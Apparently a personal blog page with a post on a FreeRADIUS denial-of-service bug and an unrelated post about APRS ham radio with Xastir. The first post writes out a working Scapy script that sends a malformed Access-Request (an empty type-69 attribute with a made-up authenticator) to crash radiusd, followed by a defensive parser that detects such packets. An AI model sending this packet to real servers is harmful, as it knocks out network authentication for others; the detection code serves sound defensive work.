Freeradius Packet of Death

I haven't had a chance to use Scapy in a little while, and I hardly spend any time in Python (I don't really know the language at all, to be honest), but a long time ago I was searching for an IPv6-capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a FreeRADIUS DoS bug. This piqued my interest, as I'm currently experiencing _something_ that periodically knocks over radiusd. Furthermore, the RADIUS server in question talks to a router with problematic L2TP tunnels (caused by software bugs in L2TP sequencing on the telco's router at the other end; their vendor has confirmed the problems).

Time to create the packet of death. Scapy doesn't appear to have a layer for RADIUS attributes yet; thankfully, there IS one in their Trac.

So, download the layer to scapy/layers and ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add "radiuslib" to the load_layers array in config.py, and we're ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP, UDP, send, Radius, RadiusAttr

if len(sys.argv) != 2:
    print("Usage: radius_killer.py <radiushost>\n")
    sys.exit(1)

# Access-Request (code 1) with a made-up 16-byte authenticator and a single
# attribute (type 69) whose length of 2 leaves no room for a value
PoD = IP(dst=sys.argv[1]) / UDP(sport=60422, dport=1812) / \
    Radius(code=1, authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99", id=180) / \
    RadiusAttr(type=69, value="", len=2)

send(PoD)


Interestingly, one doesn't need a shared key to send the packet of death: as you can see, the authenticator for the Access-Request packet is pulled out of thin air.
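From the defending side, the thing worth recognising in traffic is the shape of that packet: an attribute whose Length octet is 2, so the header is all there is. The following is an added example (not part of the original post, and not FreeRADIUS or Scapy code): a small parser that walks the attributes of a raw RADIUS datagram, reports anything that breaks attribute framing, and flags empty-value attributes. Both sample packets are constructed inline; the first reproduces the bytes the script above puts on the wire. Per-attribute minimum lengths depend on the dictionary (type 69 is Tunnel-Password from RFC 2868), so the empty-value check is deliberately generic rather than specific to one attribute.

```python
import struct

# Human-readable names for the RADIUS codes that matter here (RFC 2865 section 3)
RADIUS_CODES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
                4: "Accounting-Request", 11: "Access-Challenge"}

HEADER_LEN = 20  # code(1) + identifier(1) + length(2) + authenticator(16)


def parse_radius(data):
    """Walk one RADIUS datagram and return (header, attributes, findings).

    header is a dict (None if the packet is too short), attributes is a list of
    (type, value_bytes) tuples, and findings lists anything that violates the
    attribute framing or matches the empty-attribute shape.
    """
    findings = []
    if len(data) < HEADER_LEN:
        return None, [], ["packet is %d bytes, shorter than the %d-byte header"
                          % (len(data), HEADER_LEN)]
    code, ident, length = struct.unpack("!BBH", data[:4])
    header = {"code": code, "name": RADIUS_CODES.get(code, "code %d" % code),
              "id": ident, "length": length, "authenticator": data[4:20]}
    if length < HEADER_LEN or length > len(data):
        findings.append("Length field %d does not fit the %d bytes received"
                        % (length, len(data)))
        length = min(length, len(data))
    attrs = []
    offset = HEADER_LEN
    while offset < length:
        if length - offset < 2:
            findings.append("%d trailing byte(s) at offset %d cannot hold an attribute header"
                            % (length - offset, offset))
            break
        atype, alen = struct.unpack("!BB", data[offset:offset + 2])
        if alen < 2:
            # Length counts the Type and Length octets themselves, so < 2 is impossible
            findings.append("attribute type %d at offset %d has impossible length %d"
                            % (atype, offset, alen))
            break
        if offset + alen > length:
            findings.append("attribute type %d at offset %d runs past the end of the packet"
                            % (atype, offset))
            break
        value = data[offset + 2:offset + alen]
        attrs.append((atype, value))
        if alen == 2:
            # Exactly the shape of the packet above: a header with no value at all
            findings.append("attribute type %d at offset %d carries an empty value (length 2)"
                            % (atype, offset))
        offset += alen
    return header, attrs, findings


def is_suspicious(data):
    """True when the datagram fails framing checks or carries an empty attribute."""
    return bool(parse_radius(data)[2])


# Constructed sample 1: the Access-Request built by the script above, as raw bytes
POD_PACKET = (struct.pack("!BBH", 1, 180, HEADER_LEN + 2)  # code 1, id 180, length 22
              + b"\x99" * 16                                # made-up authenticator
              + b"\x45\x02")                                # attribute 69, length 2, no value

# Constructed sample 2: a benign Access-Request carrying User-Name (type 1) = "bob"
BENIGN_PACKET = (struct.pack("!BBH", 1, 7, HEADER_LEN + 5)
                 + b"\x00" * 16
                 + b"\x01\x05bob")

if __name__ == "__main__":
    for label, pkt in (("PoD", POD_PACKET), ("benign", BENIGN_PACKET)):
        header, attrs, findings = parse_radius(pkt)
        print("%s: %s id=%d attrs=%r" % (label, header["name"], header["id"], attrs))
        for finding in findings:
            print("  ! " + finding)
```

To run this over a capture rather than the constructed samples, feed it the UDP payload of each packet Scapy reads back with rdpcap (bytes(pkt[UDP].payload)); any datagram to port 1812 for which is_suspicious returns True is worth a closer look, whatever the client's shared secret.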

I'm assuming that most people iptable off access to their RADIUS servers, so playing whack-a-mole with a provider probably isn't that doable. Beyond that, to even come close to exploiting this, you need to be listed in clients.conf, so there's already that level of trust. Correct me if I'm wrong. Either way, updated packages are available.

RIP Milw0rm

APRS using Xastir

A couple of months back, I finally took my Amateur Radio Technician exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn't involve copious amounts of studying.

After a friend opened my eyes to a few fun things one can do with a radio scanner, I went on a "learning tangent", reading and talking to people with amateur licenses, digesting everything that one can do with a radio these days.

One of the things that has interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in the area.

Xastir focused on Central Pennsylvania

There's some interesting stuff out there. In my area there's a trucker (N6GVG) that I've followed, making runs from West Virginia to Tennessee to Pennsylvania, and from there to New Jersey. (I'm a HUGE fan of Open Transport Tycoon Deluxe; if you've not played it, seriously, get it. I only wish American trains were equipped with APRS.)

The extremely fun and addictive OTTD

I'd purchased a Yaesu VX-7R from eBay for just under $290.00.

Yaesu VX-7R with a CT-91 cable attached.

With the amateur license in tow (KB3TCN), I decided I'd start sending out my own beacons. The problem was, I couldn't figure out how to interface my sound card (I'm using soundmodem) with the Yaesu. I'd already purchased the CT-91 cable from eBay (it splits a four-conductor 3.5mm plug out into a 3.5mm headphone plug and a 2.5mm mic input), but simply connecting the sound card to the mic input (using an adapter) didn't work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I'm sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual's section on TNC connection, it turns out the solution is fairly simple: two interfaces using isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro; I'll post my modified schematics shortly... I actually wrote this post months ago).

The optimal level is 5 mV with 2 kΩ of resistance. My circuit gets it pretty close (by the way, I can't take responsibility for any harm this circuit causes; use it at your own discretion. Seriously, don't trust my judgement: this is how I change a car tire).

Anyway, it's working for me. I had to pump the sound card output up pretty high, but my beacon has reportedly been seen by others. (It's been a few weeks since I've transmitted, as my next project is a PIC-based tracker for my car.)